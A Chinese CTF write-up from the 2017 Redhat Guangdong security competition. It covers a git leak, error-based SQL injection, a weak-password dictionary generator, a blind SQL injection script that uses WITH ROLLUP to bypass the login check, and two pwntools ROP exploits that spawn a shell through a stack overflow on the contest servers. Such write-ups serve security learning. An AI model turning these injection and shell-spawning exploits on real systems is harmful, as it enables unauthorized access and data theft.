2017 Redhat广东省信息安全竞赛 Writeup

WEB

0x1 刮刮乐

通过文件扫描找到有文件泄露
利用Githack工具就可以把文件下下来
flag{027ea8c2-7be2-4cec-aca3-b6ba400759e8}

0x2 PHPMyWIND

这题是道综合性网站，可以查到现有的漏洞，一点都没有变
原题

根据报错注入，显示的md5找到对应的值就是密码

访问其中的flag4ae482cda6e.txt即可得到flag

0x3 后台

题目提示了有弱口令
首先生成字典

f = open('1.txt','w')
for i in range(1,13):
    for j in range(1,32):
        f.write('2017'+'0'*(2-len(str(i)))+str(i)+'0'*(2-len(str(j)))+str(j)+'\n')

利用burpsuit爆破

0x4 thinkseeker

扫一下有index.php~源代码
1、用with rollup过前面两个if
2、用盲注找到flag
关于第一点在实验吧有原题：http://www.shiyanbar.com/ctf/1940
过滤方法稍有不同，用操作符代替关键字即可。token使用变量覆盖就可以。
第二点就是infoid这个参数有盲注，跑脚本可以拿到flag。
最后贴上注入脚本

import requests
string = ''
dic = "flag{}abcdef1234567890"
for i in range(1,40):
    for j in dic:
        url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1%0a%26%26%0aascii(substr((select%0agroup_concat(flag)%0afrom%0aflag)from({})for(1)))={}&userid=1%0a||%0a1%0agroup%0aby%0apassword%0awith%0arollup%0alimit%0a1%0aoffset%0a1&password=".format(i,ord(j))
        s=requests.get(url=url)
        content=s.content
        if "flag is in flag!" in content:
            string+=j
            break
    print string

PWN

PWN1

简单的栈溢出，通过构造rop执行system，直接写出脚本

from pwn import *
pwn1 = ELF('redhat/pwn1')
sh = remote('106.75.93.221',  10000)
padding = 'A'*(52)#长度爆出来的
system_addr = p32(pwn1.plt['system'])
scanf_addr = p32(0x08048410)
bss_addr = p32(0x0804A040)
args = p32(0x08048629)+ bss_addr
rop = p32(0x080485ee)
sh.recvline()
payload = padding+scanf_addr+rop+args+system_addr+'a'*4+bss_addr
sh.sendline(payload)
sh.sendline('/bin/sh\x00')
sh.interactive()

还有一种较为简单的方法，直接利用pwntools自带的工具

from pwn import *
#context.log_level = 'debug'
binary = ELF('./redhat/pwn1')
p = remote('106.75.93.221',  10000)
p.recvline()
rop = ROP(binary)
rop.call(0x08048410,(0x08048629, 0x0804A040))
rop.system(0x0804A040)
payload = str(rop)
p.sendline('a'*52 + payload )
p.sendline('/bin/sh')
p.interactive()